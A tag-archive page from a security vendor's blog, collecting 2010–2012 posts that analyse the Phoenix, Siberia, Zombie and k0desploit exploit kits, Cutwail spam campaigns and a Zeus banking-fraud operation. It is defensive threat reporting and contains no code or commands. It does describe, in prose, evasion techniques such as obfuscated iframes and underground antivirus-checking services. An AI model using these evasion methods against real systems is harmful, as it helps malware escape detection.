Exploit Kits « M86 Security Labs Blog

Posts Tagged ‘Exploit Kits’

Cutwail Drives Spike in Malicious HTML Attachment Spam

By Rodel Mendrez • February 16th, 2012 • Spam

Over the past month, we have observed several large spam campaigns with malicious HTML attachments. We believe the botnet behind these campaigns is Cutwail. Here is data we collected, starting from the first day of 2012, illustrating spikes of spam with malicious HTML attachments:

Attaching an HTML file to an email is a tactic we have seen used in phishing. But recently, attackers have spammed out large volumes of HTML attachments that include malicious JavaScript. Here is an example we received a few days ago:

In the image above, we opened message with the attached .HTM file using the Mozilla Thunderbird email client. Although Thunderbird rendered the HTML attachment, fortunately its default settings prevented the malicious JavaScript in the HTML source code from running. The Thunderbird user needs to click the attachment or open the HTML file in a browser for the JavaScript to run.

The image below is another example of a more recent spam campaign. This particular message claims to be an invoice from a random company where an .HTM file is attached pretending to be an invoice file. Here, the sample spam was opened using Microsoft Outlook and the attachment just shows the icon of the default browser of the system. Again, in order for the malicious JavaScript to execute, the user needs to click the attachment to fire up a browser.

So what happens if the unsuspecting user opens the HTML attachment? Here is the HTML source code:

The first half of the HTML code is the benign part. It provides the “You are redirecting…” text in the browser title bar and prints “Please wait… Loading….” in the browser – the cybercriminal perhaps just being courteous. The second and malicious part is the script tag where the obfuscated JavaScript resides. The JavaScript writes an iframe that loads a webpage in the same browser window. But this is not an ordinary webpage; it contains code that attempts to exploit multiple vulnerabilities in the browser and its plugin. In our test machine, the landing page successfully exploited our browser’s default PDF reader with the Libtiff integer overflow in Adobe Reader vulnerability. The exploit ended up downloading and installing malware in our test computer, which at the time of writing, was a data-stealing Trojan with the antivirus detection name Cridex.

The landing page that contains the exploit code is a kit used by cybercriminals particularly for this spam campaign, the Phoenix Exploit kit. This exploit kit is readily available for cybercriminals to buy and use, all they need is their own webserver that can run PHP server scripts. The image shown below is the screenshot of the actual server’s “Phoenix Exploit’s Kit” admin page. The “—“ referrer in the statistics suggests that most visitors were NOT coming from another website but from the HTML files that the cybercriminals spammed out. It also shows over 4000 visitors, 15% of whom were successfully exploited.

Spammers tend to recycle spam campaign themes, sometimes adding different twists. So we expect more of these types of HTML attachment campaigns to come in the future.

M86 MailMarshal customers are protected against these spam campaigns, and M86 Secure Web Gateway customers are protected against the Phoenix Exploit kit.

Thanks to Daniel Chechik for the additional analysis and insight on the Phoenix kit.

Tags: Cutwail | Exploit Kits | Malicious Spam | Malware

Want to be friends on Facebook? Don’t click the link!

By Phil Hay • August 29th, 2011 • Malware

Hot on the heels of last week’s malicious attachment spam, we are now observing another large malicious spam campaign – this time without attachments. Like the majority of last week’s campaigns, this spam is being sent out from the Cutwail botnet.

The message arrives as a fake Facebook friend invite notification. The message looks convincing, it appears the spammers have copied the actual Facebook template and substituted their own links. However, there are clues it is fake. The message doesn’t contain any profile photos, and they have omitted the recipient’s email address in the fine print at the bottom.

By contrast, here is a legitimate Facebook friend request.

Clicking the link fetches a web page that contains two ways you can infect yourself. First, there is a link pretending to be an Adobe Flash update where you can download and install malware manually. Second, there is a hidden iframe that loads data from a remote server hosting the Blackhole Exploit Kit, which attempts to automatically exploit vulnerabilites on your system, notably Java.

The malware that is downloaded appears to be a data stealer Zbot variant (Virus Total report here).

Impersonation of the big social networks’ email notifications is an increasingly common tactic of the spammers. Be wary out there, not everything is as it seems.

Phoenix Exploit Kit (2.7) continues to be updated

By Daniel Chechik • June 4th, 2011 • Cybercrime

A few weeks ago, the Phoenix Exploit Kit 2.5 source code was leaked. At the time, it was not really useable, as it required activating by the author of the exploit kit. It contains an activation page that is being used to load all the exploits to the server for every specific customer. As expected, the author of the exploit kit released a new version of the tool, version 2.7.

Phoenix Exploit’s Kit 2.7 logo

The changes between the two versions are minor, but still very important as most exploits become inefficient in the very short term, especially with the latest IE vulnerabilities.

Tags: Exploit Kits | Java | PDF | Phoenix

k0desploit Exploit Kit and Stolen Credit Cards Discovered

By Avri Schneider • March 9th, 2011 • Cybercrime

During our investigative research into existing and emerging threats, we tend to make new discoveries. One of the most recent cases involved the discovery of a new toolkit:

k0de Sploit Pack

The phrase at the bottom of the page (“K0de.org Open Source Exploits”) caught our attention, as we wondered how ‘open-source’ this toolkit really was. A quick Google search lead us to the third result:

Leaked Message from Exploit Kit Author

The post (or ‘paste’ if we go by Pastie.org‘s terminology) contained a leaked message written by the toolkit author in a private hacker-forum. It reveals that this new toolkit is just a clone of the popular Eleonore with various improvements:

“As you can see it’s pretty much elenores lay out with a few touch ups & very badly made paint buttons. I’ve only been working on this for 2 hours or so, so please keep that in mind and I plan to add a lot more onto it in the coming days, so keep an eye out for news.”

The author was nice enough to provide us with interesting statistics from his own research:

“Now then, I’ve tested this on 1,000 unique hits from windows PC’s only (Xp, Vista & Win7 only) and I achieved 96 infections from it, that means the rough infection rate is at 9.6%, that is a 3.5% rise from the great Elenore mod posted by Blackdevil. Most of the infections was from MDAC & the IE kit.”

The author then calls upon fellow malware authors for their help with updating the exploits to ‘fix’ the rise in detection rate of the malicious iframe. Also, the author lists some of the modifications he has made in this toolkit:

“Since I have tested it, the detection of the iframe has risen a lot, so in order to conduct a good test, someone will have to UD the exploits again.

I have also slightly fixed up the chrome & firefox exploits, I’m not 100% sure but they seem to be hitting at least, whereas they used to do nothing.”

In addition to the “open-source” exploit kit, the page contains a long list of anonymous proxy servers near the bottom as well as stolen credit card numbers along with the login credentials of dozens of individuals.

Here’s a screen-shot of what it looked like:

Screenshot of Stolen Credentials including CC#'s

We have confirmed that upon our notice, both Google and pastie.org have removed the illegal content, prior to publishing this blog post.

Siberia Exploits Kit Fights Back Against AV Companies

By Daniel Chechik • November 30th, 2010 • Cybercrime

Siberia Exploit Kit is an evolving crimeware that was first seen in the wild in late 2009. A few months ago the author of Siberia Exploits Kit deployed an upgraded version of the toolkit, as written in the Malware Intelligence Blog.

Like our last post about Phoenix Exploit’s Kit, Siberia Exploit’s Kit author also emphasizes the issue of circumventing recognition by Anti-Virus and URL filtering services, as it contains a built in Anti-Virus checker.

Anti-Virus Detection rate of each malware

The administrator of the toolkit can perform an Anti-Virus scan of the malware and exploit pages. Moreover, the scan results of each Anti-Virus company are viewable.

Advanced information of the malware detection among the Anti-Viruses companies

It is well known that once uploading malware to a VirusTotal service, the Anti-Virus companies can re-analyze suspicious files. As such, it’s a good guess that the Siberia Exploit’s Kit doesn’t use the VirusTotal service. In this particular case, the files are sent to an underground Anti-Virus checker called “scan4you.biz”

The code that accesses to scan4you.biz AV checker (Taken from Siberia Exploit’s Kit)

Let’s take a look at our anonymous Anti-Virus checker:

After login the user can upload files and check URL’s for Anti-Virus and URL Filtering check

Of course, this service is not free. The cost is 0.15¢ for every file checked or $25 for a one month license. The website offers several scans:

File scan – Regular Anti-Virus scan
URL scan – Anti-Virus scan of URL
Blacklist / Filter scan – Check detection of URL in URL filtering services
Exploit Pack scan – Check detection of toolkit name in URL filtering services

Eventually, in order to implement this service in Siberia Exploit’s Kit, or in any other toolkit, the underground Anti-Virus check service publishes an API for remote scanning:

Snippet code of the API service provided by scan4you.biz website.

Like other techniques of evasiveness we have seen lately such as “Anti Wepawet” or “Anti JSunpack” as described in our security labs report, it appears the cybercriminals keep trying to find creative techniques to avoid malware detection in multiple layers — this time by performing an Anti-Virus scan.

Tags: Exploit Kits | Siberia | Virus scan

Don’t Get Infected By Zombies

By Gavin Neale • October 15th, 2010 • Vulnerabilities

Today we had a peek inside an exploit kit known as the Zombie Infection Kit. This kit is not as widely used as some of the more popular kits such as Eleonore and Phoenix and compared to these other kits, Zombie is not really that sophisticated. However it does carry the usual range of exploits that have been effectively used in many other exploit tool kits. Potential victims are forced to visit Zombie’s exploit page when their browser loads an IFrame placed on a compromised website. All of the vulnerabilities exploited by this kit have been patched by the vendors concerned.

As well as exploiting an old vulnerability in IE 6 and the recent Windows help center vulnerability, the Zombie Infection Kit also uses exploits targeting two Java vulnerabilities, four vulnerabilities in Adobe PDF readers and two vulnerabilities in Adobe Flash.

Success rates for the various exploits use by the Zombie infection kit

According to the exploit statistics page in the admin control panel, the two most successful vulnerabilities are in Oracle’s Java, accounting for just over 60 percent of successful infections between them. Following closely behind the Java vulnerabilities is ‘PDF’ which is actually a PDF file containing exploits for four Adobe PDF vulnerabilities; the most recent of which (CVE-2009-4324) has been patched since December 2009.

Another stats page shows a breakdown of victims by browser type, showing the percentage of successful installs for each browser.

Victim browser statistics. The last column is the percentage of successfully infected victims.

This table isn’t really indicative of how secure each browser is, as only Internet Explorer is targeted for browser specific vulnerabilities whereas all browsers are used to target vulnerabilities in Adobe Flash and PDF readers, and Java.

What this does show is that 15 percent (15.39 in the top row of the browser stats image, above) of ‘visitors’ were successfully exploited by the Zombie Infection Kit and made to download a malicious executable. Because Java vulnerabilities accounted for 60 percent of infections, a surprising nine percent of all visitors were infected just by having an old version of java installed.

Java exploits are becoming increasingly useful for web attackers, as many people don’t even know that Java is installed on their machines, or that it may need to be updated. What is worse is that it is possible to have multiple versions of Java installed on a machine so you can still be vulnerable even after you install the latest version, giving you a false sense of security.

We strongly recommend users uninstall Java if they don’t use it, or remove old versions and upgrade to the latest version just released by Oracle which fixes 29 flaws in the previous version for which exploits have recently been published.

Tags: Adobe | Exploit Kits | Java | Unpatched

Statement About Infection of Macs by ZeuS

By Bradley Anstis • August 13th, 2010 • Reports

In recent press coverage several industry publications and blogs stated that between 3,000 – 4,000 Mac OS machines had been infected with the latest ZeuS Trojan. We believe that this is an incorrect interpretation of Figure 3 from our recent M86 Security Labs report.

Figure 11, Admin Panel of Eleonore Exploit Kit

Figure 3: Stats from the Eleonore Exploit Kit Administrative Panel

Figure 3 does not show the number of infected computers. It is a screen shot of an exploit kit console that shows the number of times that the malicious page had been requested and identifies those visits by the type of operating system of the visitor’s computer. In this case, it shows that the exploit kit’s page was served to as many as 300,000 users of which 3,851 visits were from computers running Mac OS.

Tags: Exploit Kits | ZeuS

Customers of Global Financial Institution Hit by Cybercrime

By Bradley Anstis • August 10th, 2010 • Reports

Today, we released a report of an attack targeting the UK customers of a global financial institution. This attack has been on-going since early July, and our research has discovered that approximately 3000 customers of this financial institution have fallen victim to it. We’ve estimated that close to £675,000 GBP (over $1 Million USD) has been stolen from customer accounts.

The M86 Security Labs team detected this illegal operation after discovering a malicious code attack used to infect users’ PCs with a Trojan. The team then followed the trail to a Command & Control center. The research reveals that the cybercriminals used a combination of exploit kits, the new Zeus v3 Trojan, and money mule accounts to compromise user systems, successfully avoid anti-fraud systems, and rob bank accounts. The whole operation shows a high degree of technical sophistication and complexity, and highlights the continuing and escalating battle we have with cybercrime.

Our report exposes the architecture, business model, tools and methods used by the cybercriminal operation behind this attack. You can download a copy of the report here.

The image below illustrates one of the cybercriminal’s admin panels,showing financial transactions from compromised accounts sent to money mule accounts.

Admin panel showing financial transactions from compromised accounts sent to Money Mule accounts

M86 Security representatives have informed relevant law enforcement agencies of all criminal activities and methods used by the perpetrators of this attack.

Tags: eBanking | Exploit Kits | Money Mules | ZeuS

Phoenix Exploit Kit 2.0

By Daniel Chechik • August 1st, 2010 • Cybercrime

Phoenix Exploit’s Kit 2.0 is an upgraded version of the Phoenix Toolkit which was initially researched by the M86 Security Labs mid-2009.

The GUI of the admin panel has not changed significantly from the previous version, but in addition to new features and exploits, a new obfuscation technique has been employed.

Figure 1: The login panel of Phoenix Exploit’s Kit

Tags: Exploit Kits | Phoenix